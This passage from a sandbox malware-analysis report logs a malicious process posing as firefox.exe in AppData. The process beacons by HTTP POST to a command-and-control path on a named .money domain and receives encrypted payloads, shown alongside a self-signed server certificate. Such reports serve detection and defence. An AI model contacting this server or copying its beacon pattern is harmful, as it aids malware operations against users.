..R.wS..tIP.6...0020: 5E 05 16 D8 18 1C AF 71 E2 02 D3 0F FD 70 94 51 ......q.....p.Q0030: 15 86 58 D2 E1 A4 11 54 6F F4 5E 8F BA CD F6 FF ..X....To. .....0040: EB AA 07 0E EF 33 E2 0F D9 35 0B 68 C2 71 85 F5 .....3...5.h.q..0050: 12 EC EE A2 40 47 2E 35 7F 33 28 AD B8 3D 9E FB [email protected](..=..0060: F0 ED 92 7A 55 5E B4 F3 98 C6 41 F0 94 D1 49 77 ...zU ....A...Iw0070: 3D 2A 5A 99 4E 3B 9D A1 88 E0 35 97 4E B5 A6 2C =*Z.N;....5.N..,0080: 5E 91 5C 15 73 45 86 16 30 91 91 79 42 00 99 C5 .\.sE..0..yB...0090: BC 54 D1 02 88 91 CE 7F DA 85 1B DC 37
E8 9A F6 .T..........7...00A0: F5 EA 72 2D A2 AC 28 09 30 9E 9B 32 57 30 5F EF ..r-..(.0..2W0_.00B0: 99 02 FA 13 55 00 7B 98 AE ED 09 99 9E 5E 03 51 ....U........ .Q00C0: 13 30 22 05 00 66 8C AE 01 D7 7E 85 49 FE 5B AB .0"..f......I.[.00D0: B8 88 95 CE F9 54 13 36 9C BC 44 9C 55 C6 01 C0 .....T.6..D.U...00E0: 91 FD FC F9 13 FA FA BE CD F2 38 FD 80 CD D8 FA ..........8.....00F0: 67 45 3E 65 12 1C 04 EF 86 4A C2 C7 21 FC 59 D9 gE>e.....J..!.Y.0100: BC 07 2C 8F 92 AC E2 89 04 19 C2 0A 14 5B 93 BF ..,..........[..0110: 3C 07 EA B8 35 A9 37 09 0A BC ED CF FB DE 67 EF <...5.7.......g.0120: F3 9A 5B 28 17 71 24 61 DB 36 5E D3 11 1A 9D 13 ..[(.q$a.6 .....0130: 81 88 00 73 BF 6A E7 39 0E 50 97 7B C3 8A 13 65 ...s.j.9.P.....e0140: 07 6A 37 63 8E 35 61 71 6A 92 F1 13 EE 77 FD F6 .j7c.5aqj....w..0150: 80 B0 D8 DA A5 43 4E 8E 4A 54 C0 DF 4C 8F 82 73 .....CN.JT..L..s0160: F7 63 13 26 09 31 04 F8 D7 43 A0 8D F1 B9 53 2B .c.&.1...C....S+0170: 42 06 C6 50 70 E1 85 54 B7 F8 EB 2A C1 E2 91 9A B..Pp..T...*....0180: 42 FB AA 11 3A 2F DB 95 D1 69 4C 76 A0 75 CE 23 B...:/...iLv.u.#0190: 56 6E B0 01 AC 84 08 46 5C 96 33 A7 E9 4B 19 B2 Vn.....F\.3..K..01A0: 59 10 12 45 56 A1 52 72 52 EC 25 77 D4 2F E8 16 Y..EV.RrR.%w./..01B0: AB 73 3B F2 8C AE AF C0 8E 30 52 37 7E 59 7F C3 .s;......0R7.Y..01C0: EB 01 83 A0 98 0A 8A 13 84 F9 8C D9 6A 18 10 5D ............j..]01D0: 24 D9 88 D9 51 73 19 C3 5E 0C 15 9D 1C 78 8B D5 $...Qs.. ....x..01E0: F0 A9 74 F1 28 58 23 BD 44 CC 2D B3 CE E2 46 57 ..t.(X#.D.-...FW01F0: BF 4D D8 6C 38 09 8C 5F CD 30 6A C0 3A 86 77 DF .M.l8.._.0j.:.w.]
TimestampSourcePort
DestPort Source IP Dest IP Subject Issuer
NotBefore
NotAfter Raw
Copyright Joe Security LLC 2018 Page 64 of 149
Mai 7, 2018 14:49:58.977407932 MESZ
443 49165 91.92.137.74 192.168.1.81 CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US
CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US
Tue Mar 17 15:16:38 CET 2015
Thu Mar 09 15:16:38 CET 2045
[[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 [email protected]../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1 ...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y` d..n, ..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 ..... ...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c]
TimestampSourcePort
DestPort Source IP Dest IP Subject Issuer
NotBefore
NotAfter Raw
Session ID Source IP Source Port Destination IP Destination Port Process
0 192.168.1.81 49162 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
HTTPS Proxied Packets
Copyright Joe Security LLC 2018 Page 65 of 149
TimestampkBytestransferred Direction Data
2018-05-07 12:49:50 UTC 0 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 0Cache-Control: no-cache
2018-05-07 12:49:50 UTC 0 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:49:50 UTC 0 IN Data Raw: 32 38 0d 0a 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 0d 0a 30 0d 0a 0d 0a Data Ascii: 289ec9be34fd447911df7464ecd88bd89434f6c10c0
Session ID Source IP Source Port Destination IP Destination Port Process
1 192.168.1.81 49164 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:49:52 UTC 0 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 9Cache-Control: no-cache
2018-05-07 12:49:52 UTC 0 OUT Data Raw: 5b 0c 0d 45 0b 0b 47 07 54 Data Ascii: [EGT
2018-05-07 12:49:52 UTC 0 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:49:52 UTC 0 IN Data Raw: 31 66 63 30 0d 0a 74 3f f3 39 61 65 33 34 62 64 34 34 c8 c6 31 31 dc 66 37 34 36 34 65 63 24 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 c6 34 65 63 6a 27 82 6c 64 8c 30 f9 12 8c 67 7a ae 10 64 0b 50 16 43 49 10 0a 54 46 07 09 14 57 56 57 5f 5e 10 46 55 51 16 46 10 0d 44 51 56 42 20 77 6a 14 5e 5b 02 53 4d 3c 3d 69 1d 65 63 39 62 65 33 34 8e bc 80 14 9b 80 eb 42 c8 df ed 47 9a 8d bf 10 39 47 2d 11 de 81 e3 47 6e 4b 71 45 c6 88 ea 10 64 1a 77 4a 93 dc e9 47 c3 a5 6d 47 98 80 eb 42 c1 a7 7e 47 9d 8d bf 10 c8 81 e3 11 a6 81 e3 47 bc 62 72 45 ca 88 ea 10 b6 33 76 4a d8 dc e9 47 ac 33 27 47 9a 80 eb 42 ae 31 21 47 9b 8d bf 10 36 51 5b 0a c8 81 e3 47 33 34 66 36 63 31 30 63 69 20 63 39 2e 64 36 34 17 Data Ascii: 1fc0t?9ae34bd4411f7464ec$88bd89434f6c10c9ec9be34fd447911df744ecj'ld0gzdPCITFWVW_ FUQFDQVB wj [SM<=iec9be34BG9G-GnKqEdwJGmGB~GGbrE3vJG3'GB1!G6Q[G34f6c10ci c9.d64
2018-05-07 12:49:53 UTC 16 IN Data Raw: 23 cb 13 9c cb 21 2f 9c 36 21 33 99 22 2c 93 33 75 3c 3a b3 fb 39 ad fb 6c bf df b5 8a 2a 62 31 30 34 b2 18 6f bc 9d 10 34 07 a6 8d e8 37 37 39 ba 64 74 ed 72 3c 60 b1 b7 17 6e b3 70 5e ef 4d 35 37 fb df 6e bd 13 0d bb 2e 35 66 93 6a 08 25 00 ef ef 29 d8 5c 37 09 31 31 e1 b4 43 21 c9 45 35 30 37 6f d0 35 4a 38 39 bf f9 b7 a2 2e ea 7c cc 88 0d 0a 32 30 30 30 0d 0a 28 9a 15 69 31 32 cc 21 de c6 33 24 ae b2 fb b8 31 9a be 71 c2 3f a4 6c e0 a5 3b 62 64 bb 44 24 33 5e 26 5e 63 01 30 63 4d 72 0b c9 63 65 33 67 35 33 dc 23 19 39 31 ba ae e5 f3 2c bf 79 95 88 77 50 b8 63 64 38 6a 63 cc 21 de 94 64 21 a9 e8 f3 ec 36 c9 eb 20 db 3f a7 6b b0 6f 34 39 31 b2 19 76 37 67 39 b0 b1 62 64 38 b3 27 88 b3 4c 3c cc 44 32 60 9c 44 cc 9c 4c 91 34 d1 14 4b 33 34 e5 a0 2c b1 f7 Data Ascii: #!/6!3",3u<:9l*b104o4779dtr<`np^M57n.5fj%)\711C!E507o5J89.|2000(i12!3$1q?l;bdD$3 & c0cMrce3g53#91,ywPcd8jc!d!6 ?ko491v7g9bd8'L<D2`DL4K34,
2018-05-07 12:49:53 UTC 32 IN Data Raw: 59 5b e0 66 27 67 65 cb 70 93 c7 3f 28 3d 3a 63 f0 f7 66 bf 8a 61 9c 44 3c 9c 4c 6d 9c 2c 7e c6 34 24 ed 9c b1 cb 43 07 62 ce 11 6a c8 21 d6 96 62 73 9b 4d 28 61 9c 6f c6 21 2f 97 61 26 e8 e9 b5 b8 4d 44 48 e6 34 e8 70 35 36 8c 63 e3 c8 c6 62 ba 94 31 61 f2 32 2a 65 9c 71 34 9b 65 74 bb fd 24 b8 f2 38 6d 3c 6c f3 36 b2 89 9c 0c 7e c5 34 24 99 51 84 94 30 29 ce 44 6c 8e a5 cb c9 cb e6 a7 0d 0a 31 30 30 30 0d 0a 68 65 fb 37 ef d4 81 08 8e 35 76 66 33 ce 45 6b d1 1e 9c c6 9d e6 f7 38 3b a7 61 bf db 6a 67 66 9b 13 3f 07 c0 bf bb 8b df c7 c7 9d ef c0 60 b1 cc 40 78 c9 16 39 d8 ab c6 9a 9c b2 92 3c b6 c2 12 6b cb 41 3b 6f 66 d9 78 66 37 34 b5 f0 69 e8 bc 6f c7 77 d0 9a 3e 24 65 cb 73 82 c1 36 20 3a 60 3a 3d b2 a1 3e 6e f7 33 ef d8 62 bc 4c 21 b4 92 12 20 5e 36 Data Ascii: Y[f'gep?(=:cfaD<Lm,~4$Cbj!bsM(ao!/a&MDH4p56cb1a2*eq4et$8m<l6~4$Q0)Dl1000he75vf3Ek8;ajgf?`@x9<kA;ofxf74iow>$es6 : :=>n3bL! 6
2018-05-07 12:49:53 UTC 48 IN Data Raw: ba 74 6c 47 6a f8 bd 44 59 60 94 0b f8 ef 19 e8 92 9f 98 9f 0e fe 61 31 30 c8 b4 e0 df c2 9d 9a 60 64 8e 98 9c cb c8 ba f5 3d e9 e3 8f cf c9 cb 35 9c 11 c8 ff e7 dc c3 c6 cb 34 34 67 36 9c 24 30 c6 3e 75 e6 f9 6d e1 dc 34 66 64 5e 74 5f 39 01 31 64 99 41 64 c9 42 51 9c 11 d4 c7 77 dc 9a 3e 24 ba 71 9a b3 a3 3e b4 ad 39 65 63 6a 9d 13 67 cb 13 6c 64 cb 42 d5 ce 24 d8 c4 30 24 b3 f4 6a e7 d1 38 38 62 45 65 d1 07 f3 52 5d 70 65 42 0b ee 87 69 62 39 62 ee 34 37 23 6c 5e 34 c8 4e cd 61 ef 21 cf 37 73 c8 35 9c 11 d4 c7 77 d8 9a 3e 24 b6 f4 69 b2 e2 31 30 63 b2 28 8b 36 d5 23 35 75 e5 a3 1c bd 7a d1 0a f9 18 ad ba 71 d2 64 0f 7b e9 7d f4 32 0e 38 c6 41 df cb 73 ca c7 36 20 e6 f9 10 35 69 08 61 be 71 9a 34 bf 71 e7 ba f1 39 34 99 42 d8 c9 21 d9 c1 63 28 bd a2 10 Data Ascii: tlGjDY`a10`d=544g6$0>um4fd t_91dAdBQw>$q>9ecjgldB$0$j88bEeR]peBib9b47#l 4Na!7s5w>$i10c(6#5uzqd{}28As6 5iaq4q94B!c(
2018-05-07 12:49:53 UTC 64 IN Data Raw: 1b 76 e9 7d c8 32 0e 3c c6 41 3b dc 61 28 63 31 b3 a7 35 ee ab d2 72 ee ba a4 66 64 34 bf 72 31 3e 86 68 27 b4 d5 32 b4 18 9f 64 4c 3f e9 21 c0 ba 54 43 c9 ed f7 aa f2 65 e8 d5 e6 5e d1 5d 6d 23 34 13 75 bf 79 3f 98 a9 a7 63 76 38 83 32 7c e6 83 60 65 fb 08 64 c7 4c 3c db bd 99 c9 9c 68 69 3e fa 30 e8 d5 e1 89 2b b9 2b 8c 67 63 c8 4c 3d d9 3b 8e c8 cb bd 69 6d dc 64 39 38 62 5f e7 4a 54 b8 79 8e b5 1a 45 31 1d 2d e8 26 d1 32 0f 32 67 8e e4 29 34 37 b2 7c d9 e7 a2 3b df 3b bf e4 f3 64 38 38 6d d3 3c 61 b7 d3 35 e3 f6 17 2f b0 1e cd 65 e8 b8 f6 65 33 34 69 d2 38 2c 43 3e ba 74 94 e5 57 44 cb bf a4 8a b6 38 38 62 e4 45 cd 34 47 33 ed 7b 93 b2 51 13 c4 ee a0 d0 dc 65 33 34 ed 21 dc b7 4f 4d 30 4f 49 ed f4 f5 ce 3c ec 26 6c b5 75 8a 6b 8e f9 65 63 dc 7e 28 63 Data Ascii: v}2<A;a(c15rfd4r1>h'2dL?!TCe ]m#4uy?cv82| edL<hi>0++gcL=;imd98b_JTyE1-&22g)47|;;d88m<a5/ee34i8,C>tWD88bE4G3{Qe34!OM0OI<&lukec~(c
Copyright Joe Security LLC 2018 Page 66 of 149
2018-05-07 12:49:53 UTC 80 IN Data Raw: bc f6 47 32 e7 f8 63 31 34 63 ba 58 8f 06 6a 75 32 3b ea ed 35 34 37 b8 d6 2e 67 6e 34 3b 98 69 91 e8 21 cc 0b ab e0 f8 40 37 59 24 3f 9f 63 33 30 63 4d 66 e0 f0 6a cc 33 30 66 64 40 37 b4 f0 35 98 64 6e 37 34 42 37 e6 aa 66 bd fa 16 67 bb f0 35 9a 34 67 36 63 45 36 e2 f0 65 63 31 62 ee e3 8f 66 04 34 34 14 ea 45 1b e5 9c 37 14 36 34 11 7f e5 c2 38 22 64 38 4d 38 08 e7 13 20 e2 f8 30 60 39 65 88 37 e3 ac 33 36 66 64 df 32 b6 f0 31 30 64 66 5d 74 13 74 e5 63 64 63 13 a1 10 23 14 f4 4c 34 66 42 6f 1a f3 16 2f e4 aa 39 62 65 32 df 0d 0a 38 30 30 30 0d 0a 68 e5 fd 34 37 39 32 da 62 e7 fe 34 36 34 67 e8 a3 1b 45 6a 93 e8 1a f5 38 f3 5d f7 6c b5 85 63 39 65 33 d1 46 98 cc cb 36 ed 71 38 df 95 23 31 64 3f 6e 3b 98 69 69 e8 21 34 0b ab e0 f8 40 37 59 24 3f 9f 63 Data Ascii: G2c14cXju2;547.gn4;i!@7Y$?c30cMfj30fd@75dn74B7fg54g6cE6ec1bf44E7648"d8M8 0`9e736fd210df]ttcdc#L4fBo/9be28000h4792b464gEj8]lc9e3F6q8#1d?n;ii!4@7Y$?c
2018-05-07 12:49:53 UTC 96 IN Data Raw: 10 34 54 2e 66 79 64 61 60 78 29 5f 00 34 41 10 42 43 60 09 07 4f 46 76 7d 34 6a 78 28 6c 55 63 05 27 72 28 2d 0f 53 2f 7d 7e 32 2e 70 34 29 10 0b 28 27 46 70 15 13 0d 7b 27 3a 11 13 5b 43 3b 19 34 7f 02 20 00 29 7c 05 30 76 37 54 39 6a 36 19 67 58 4c 47 0e 14 0e 47 31 22 31 71 7f 7b 79 53 2f 20 6b 68 52 55 73 69 34 25 02 54 15 68 15 6a 4a 38 4e 5a 7a 27 5d 22 34 28 3e 77 71 79 0e 09 7b 3d 27 63 64 72 79 24 5a 64 38 38 62 69 10 1f 10 09 66 1a 15 48 15 07 47 12 5a 5b 41 62 65 33 34 34 33 79 7c 06 08 63 06 25 2b 7f 73 63 01 65 63 7e 1b 01 5a 04 7c 0e 71 0b 30 40 17 59 45 30 63 7e 2b 34 0d 5b 22 62 7e 22 25 73 7a 66 72 31 31 6b 5c 14 70 5e 06 51 5b 59 30 11 4a 5a 24 39 34 01 03 55 0e 27 65 08 27 76 26 3b 6f 2b 20 77 75 3c 64 34 34 57 7a 6e 4a 4f 5f 7f 02 1c Data Ascii: 4T.fyda`x)_4ABC`OFv}4jx(lUc'r(-S/}~2.p4)('Fp{':[C;4 )|0v7T9j6gXLGG1"1q{yS/ khRUsi4%ThjJ8NZz']"4(>wqy{='cdry$Zd88bifHGZ[Abe3443y|c%+scec~Z|q0@YE0c~+4["b~"%szfr11k\p Q[Y0JZ$94U'e'v&;o+ wu<d44WznJO_
2018-05-07 12:49:53 UTC 112 IN Data Raw: 55 34 5a 34 05 36 02 31 44 63 50 65 0c 39 0c 65 1d 34 46 64 7d 34 43 39 11 31 0d 66 44 34 16 34 08 63 0b 38 4b 62 10 38 19 34 5f 34 0f 36 08 31 55 63 55 65 1a 39 42 65 47 34 0e 64 51 34 17 39 43 31 01 66 44 34 43 34 09 63 10 38 18 62 0b 38 5f 34 13 34 05 36 02 31 5c 63 55 65 0a 39 0c 65 54 34 46 64 55 34 59 39 11 31 29 66 64 34 7f 34 29 63 49 38 5b 62 0b 38 54 34 43 34 0f 36 0f 31 55 63 5d 65 43 39 4a 65 1c 34 05 64 58 34 45 39 18 31 44 66 51 34 43 34 0b 63 07 38 4c 62 0d 38 56 34 5d 34 46 36 05 31 42 63 56 65 0e 39 42 65 52 34 46 64 5a 34 56 39 45 31 0d 0a 38 30 30 30 0d 0a 0d 66 41 34 53 34 45 63 07 38 57 62 0a 38 4a 34 47 34 14 36 16 31 53 63 4d 65 0c 39 10 65 13 34 09 64 46 34 17 39 57 31 16 66 58 34 5b 34 45 63 20 38 54 62 08 38 74 34 52 34 0f 36 0d Data Ascii: U4Z461DcPe9e4Fd}4C91fD44c8Kb84_461UcUe9BeG4dQ49C1fD4C4c8b8_4461\cUe9eT4FdU4Y91)fd44)cI8[b8T4C461Uc]eC9Je4dX4E91DfQ4C4c8Lb8V4]4F61BcVe9BeR4FdZ4V9E18000fA4S4Ec8Wb8J4G461ScMe9e4dF49W1fX4[4Ec 8Tb8t4R46
2018-05-07 12:49:53 UTC 128 IN Data Raw: 62 cb 13 88 74 29 84 8a 39 3f 68 c6 10 25 20 94 79 50 ad 01 75 62 6c 4d 1d 0d 7e 20 ed b6 12 f0 31 16 38 24 d3 3b 83 26 53 2d 32 6f 44 36 57 39 41 50 64 8d 38 07 f6 55 35 61 11 39 78 32 a4 0d 1b 3b 47 39 16 37 3e d1 3e 03 3d 33 e8 0c 72 56 e3 34 14 47 5c 26 17 88 30 33 b2 e5 37 49 26 34 6a d4 a4 4c 3d e2 e7 f0 3d df 36 11 9d 66 09 d2 d0 63 c9 66 6f 51 73 50 31 66 53 74 30 27 37 07 81 04 e7 c0 97 54 36 34 2d 63 33 b3 45 6e 10 7d 71 40 33 0f e5 de 60 45 1f e0 d1 65 6f 4d 53 e6 db 09 12 7e 10 19 f4 d9 0e 44 28 87 0a 32 bd 74 aa a2 8d 28 6f 33 35 00 3d 30 d8 0d 44 37 34 ce 60 6b d2 73 4d 09 32 55 73 13 07 64 38 df 17 7c 01 38 d2 f7 3a dc 05 50 c5 42 62 39 98 2e aa c7 69 20 f4 b2 42 25 43 23 61 71 ba db 41 3e 16 6d b8 66 e0 a5 63 df 39 a8 35 ff 24 75 3f 20 de Data Ascii: bt)9?h% yPublM~ 18$;&S-2oD6W9APd8U5a9x2;G97>>=3rV4G\&037I&4jL==6fcfoQsP1fSt0'7T64-c3En}q@3`EeoMS~D(2t(o35=0D74`ksM2Usd8|8:PBb9.i B%C#aqA>mfc95$u?
2018-05-07 12:49:53 UTC 144 IN Data Raw: 09 21 73 38 35 36 b9 19 40 63 02 9d 3a b8 73 fb 4c 15 ed 93 1f eb 17 a2 d0 91 3b 55 67 dc 88 a4 64 53 62 c8 0c 64 75 e8 26 84 2b cc 18 d5 e0 f9 16 9c 9b 2e d3 19 89 93 63 2b 37 35 25 30 32 c1 ba e8 f4 40 df ee 83 5c 65 63 37 98 12 b0 14 38 39 61 be 04 62 08 58 74 f0 66 a9 60 9b 12 66 bb 65 a4 61 e9 30 0f 67 d1 2b b9 fe 63 70 84 16 a8 60 50 ad ff 14 22 70 79 84 24 f5 34 46 09 ea 39 30 ea 71 61 ea 71 6e ec 7b 34 76 ed 7c 28 be 71 39 f2 44 99 41 24 de 1d 05 67 9b 4e 20 6e 8c 19 49 34 43 0a 3f bf 65 31 b9 25 3d ec 25 35 eb 23 b3 24 ef 22 28 bd 71 31 30 00 75 63 3d c4 de 0a 55 6a 0d 0a 38 30 30 30 0d 0a ef 66 3c e2 e9 6c 3a 35 b0 ce 99 b6 43 31 bb 25 2d 3c ea 6f 66 e8 73 4a 76 11 3d cb 00 8b 3a da 62 6d 27 8a 76 d5 41 95 9b c7 61 6a ef 6e 25 b4 31 bf 20 2e 3a Data Ascii: !s856@c:sL;UgdSbdu&+.c+75%02@\ec789abXtf fea0g+cp`P"py$4F90qaqn{4v|(q9DA$gN nI4C?e1%=%5#$"(q10uc=Uj8000f<l:5C1%-<ofsJv=:bm'vAajn%1 .:
2018-05-07 12:49:53 UTC 160 IN Data Raw: db 7a 00 06 ac 5e dd 5c b4 18 70 d6 2c b9 65 7e a4 6c 94 2d 3c 8a b0 18 62 64 be 77 62 66 6f d9 16 b3 3b 65 c0 60 3b 3a ba 26 e5 25 3b bf f4 d9 8d 67 0c a2 32 65 24 72 d5 62 e1 f8 61 3b 11 38 3d 5e 37 6c a5 60 0b fd 65 22 38 54 24 38 67 24 32 ec 27 65 28 61 70 38 37 70 65 86 76 35 31 73 64 61 a1 79 39 8a 25 39 cb 51 33 84 ad 04 66 9b 37 22 38 95 22 38 bf 22 32 37 27 65 2e c8 76 38 e5 71 65 e7 7d 6d b5 d4 e5 9b 3d bb f8 6a a7 69 59 56 32 76 28 05 b8 62 63 8b f3 0d 44 99 37 17 6f e7 8c ed ab 25 2b d1 5b 38 45 ca b0 48 76 01 5c 3b 54 46 38 77 5d 60 25 4a 39 bf 2e 76 6f ba 39 60 71 75 53 23 ab 25 b8 c5 8d 61 8a 7b 77 18 67 25 0c da 66 32 54 91 62 66 57 ce 18 24 8f 33 d1 35 52 8f 96 0d 63 c2 46 02 6a ee a4 d1 61 c7 c6 74 60 a3 dc a5 67 0a ba 73 61 66 b4 4c 06 Data Ascii: z \p,e~l-<bdwbfo;e ;:&%;g2e$rba;8= 7l`e"8T$8g$2'e(ap87pev51sday9%9Q3f7"8"8"27'e.v8qe}m=jiYV2v(bcD7o%+[8EHv\;TF8w]`%J9.vo9`quS#%a{wg%f2TbfW$35RcFjat`gsafL
2018-05-07 12:49:53 UTC 176 IN Data Raw: d1 26 6a cb 99 6f 63 ba 7d 97 b1 61 6c 7e 59 65 cd 48 bc db cb 34 37 39 31 66 e9 e3 ee c9 c9 cb 0f 43 64 68 fe e7 bc 38 29 34 db 34 bc 25 63 31 03 b8 51 9b 60 39 5a 65 05 ca 99 9b 67 64 be 19 6c c9 ec fb ef 34 22 dc d8 62 64 00 b3 27 6c b3 b9 58 3b 34 66 36 e0 f5 28 e0 c1 64 63 4c 65 0d 13 67 27 64 df 34 3d ba c9 33 11 75 5f 74 bf 34 6e ee e1 39 14 32 8c ad 39 19 73 6d 3f bb 26 c1 60 67 28 0d 63 38 62 65 b3 dc 9e 80 cb 34 c8 ba f5 3d e1 a6 42 13 2e b9 20 9b 65 23 38 1a 34 50 51 35 33 0d 99 43 93 b8 4d 9b d1 71 59 dc 63 44 23 34 6b 9b 21 2c 37 09 70 31 ef 23 c3 bd 73 b4 b9 e8 21 c0 b1 27 84 38 73 35 0d 0a 38 30 30 30 0d 0a 33 1a ef 73 87 bc 75 8b 69 4d ee 7c 82 e5 32 ec e6 45 f8 cf 37 c6 ce b8 11 be df 32 0d 34 9a 9c e1 f8 4c 51 ef 4d 39 38 60 67 31 bb e5 Data Ascii: &joc}al~YeH4791fCdh8)44%c1Q`9Zegdl4"bd'lX;4f6(dcLeg'd4=3u_t4n929sm?&`g(c8be4=B. e#84PQ53CMqYcD#4k!,7p1#s!'8s580003suiM|2E724LQM98`g1
